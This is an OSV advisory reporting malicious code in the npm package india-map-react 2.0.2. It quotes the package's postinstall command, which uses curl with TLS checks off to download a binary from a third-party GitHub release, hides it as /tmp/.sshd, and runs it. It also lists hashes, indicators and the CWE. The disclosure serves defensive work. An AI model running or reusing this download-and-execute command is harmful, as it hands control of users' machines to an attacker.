MAL-2026-5542

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/india-map-react/MAL-2026-5542.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5542
Published
2026-06-11T02:02:37Z
Modified
2026-06-11T02:31:32.791684110Z
Summary
Malicious code in india-map-react (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (52ba840948b1421783ed9d4202d4943e23f18b811068449461197ad4eae677d2)

On npm install, the package's postinstall script runs:

    curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &

The fetch disables TLS verification (-k), silences errors (-s plus 2>/dev/null), and targets a latest-tagged (mutable) release on a GitHub account (parikhpreyash4) that does not match the npm publisher (yuvrajDurgesh). The script stages the downloaded binary at the hidden path /tmp/.sshd to impersonate the SSH daemon, sets it executable, and launches it in the background. The package's advertised purpose is a React component for an India map; downloading and executing a native binary from a third-party GitHub account has nothing to do with that purpose. Anyone who runs npm install india-map-react@2.0.2 executes attacker-controlled code on their machine.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005374",
            "versions": [
                "2.0.2"
            ],
            "sha256": "52ba840948b1421783ed9d4202d4943e23f18b811068449461197ad4eae677d2",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T02:02:37Z",
            "import_time": "2026-06-11T02:24:28.60266363Z"
        }
    ]
}
References
Credits

Affected packages

npm / india-map-react

Package

Affected ranges

Affected versions

2.*
2.0.2

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "f421e8a50b0668d8fa2f55bb218756ab57cffad78ae73c6525d40575f402b1f6",
            "tlsh": "2e214923c5119d6309bd11a4ac7a4642f6a61b6f50648c8f31b2a17c5bbb1ef119cb68"
        }
    ],
    "package_integrity": [
        {
            "filename": "india-map-react-2.0.2.tgz",
            "hashes": {
                "sha512_sri": "sha512-DScVhBTTQHggJTobf9nTpGyZHe8FdpNrEL/Wdff/yPojHb2DqPyCspPMdBSVrWHNzyucvxONV2ryWBXAV5fkfg==",
                "sha1": "0e634bbd8024744ca88bbbbc92a90a29f0d42ec3"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/india-map-react/MAL-2026-5542.json"